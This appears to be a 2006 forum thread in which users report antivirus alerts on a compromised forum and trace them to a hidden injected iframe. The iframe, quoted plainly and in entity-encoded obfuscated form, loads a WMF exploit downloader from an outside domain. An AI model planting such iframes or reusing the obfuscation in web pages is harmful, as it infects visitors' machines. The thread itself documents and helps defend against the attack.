Have the forums been hacked?

[RaisinCain]

Went to forums to post items for sale, clicked submit new post & BAM! NOD32 is going crazy saying that a trojan is trying to d/l through http. WTF?

[84Mark]

Any page that I browse to on the forums I get the following message from SAV:

Scan type: Auto-Protect Scan

Event: Threat Found!

Threat: Downloader

File: C:\Documents and Settings\Mark\Local Settings\Temporary Internet Files\Content.IE5\59Y2FM62\xpladv543[1].wmf

Location: C:\Documents and Settings\Mark\Local Settings\Temporary Internet Files\Content.IE5\59Y2FM62

Computer: JEDIMARK

User: Mark

Action taken: Clean failed : Quarantine failed : Access denied

Date found: 08 July 2006 09:55:36

(Please use small sizes for your images - Aaron)

I've scanned my computer and found nothing and it doesn't happen on any other websites?

[jamend]

I'm getting this too. A lot of unpatched people are going to get hacked (edit: the WMF exploit was patched post-SP2).

[84Mark]

Same here:

https://www.neowin.net/forum/index.php?show...view=getnewpost

[Ytterbium]

Me too, NOD is going nuts

[iascoot]

When browsing neowin forums, every page i load says it in infected with Exploit.WMF trojan

SFLKSFNJ!

Connects to site zchxsikpgz.biz

only happens at this forum, no other locations

[Mx]

Same here too.

[Rudy]

nothing here....points to sig :D

[iascoot]

same here, big issues.. just posted about it, refreshed and seen this one

set your browser to higfh security temporary to stop it, just means most scripts wont work

[84Mark]

Place zchxsikpgz.biz in your restricted sites in IE.

[Lowdar]

I'm in Firefox now, but when I was viewing Neowin in Internet Explorer seven different trojans appeared. :p

[Ranta]

McAfee is going crazy, something is definately wrong with neowin.

[chavo]

No issues here. Running Konqueror 3.5.2 on Kubuntu 6.06.

[accesser]

Yeah I'm getting a pop-up like the ones you get to type text into a site

[RaisinCain]

Anyone notify a MOD?

[iascoot]

THIS IS IN THE SOURCE NEAR TOP

<iframe src="https://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe>

but is hidden behind other char's

directly under <body>

Edited July 8, 2006 by iascoot

[RaisinCain]

No issues here. Running Konqueror 3.5.2 on Kubuntu 6.06.

It won't affect Linux only Windows users using IE.

[da13ro]

Yes, if anyone has contact with a Mod or someone higher, i think the site needs to go into maintnance. Nice spot guys (im on FF)

[iascoot]

i PM'ed REDMARK twice but no response,

i posted another post about this in forum issues and it got deleted but this one stayed so SOMEONE knows...

[84Mark]

I was going to PM Redmak but then I noticed he was viewing the topic already so I'm sure it will be sorted soon...

[Rudy]

It won't affect Linux only Windows users using IE.

he prolly just was being a smartass like i was in my post

[RaisinCain]

Check this out.

[Japlabot]

<iframe src=" 104; 116; 116; 112; 58; 47; 47; 122; 99; 104; 120; 115; 105; 107; 112; 103; 122; 46; 98; 105; 122; 47; 100; 108; 47; 97; 100; 118; 53; 52; 51; 46; 112; 104; 112;" width=1 height=1></iframe>

When the HTML entities are decoded (" ;"), it is http://zchxsikpgz.biz/dl/adv543.php

Didn't affect Firefox, had to fire up IE7 Beta 3 to see it, and NOD32 stopped it.

Edited July 8, 2006 by Quick Reply

[John Veteran]

Once that IFRAME is removed, everything should be fine. But how was the forum hacked in the first place???

[Redmak Administrators]

Can anyone post a selection of the source because I don't see it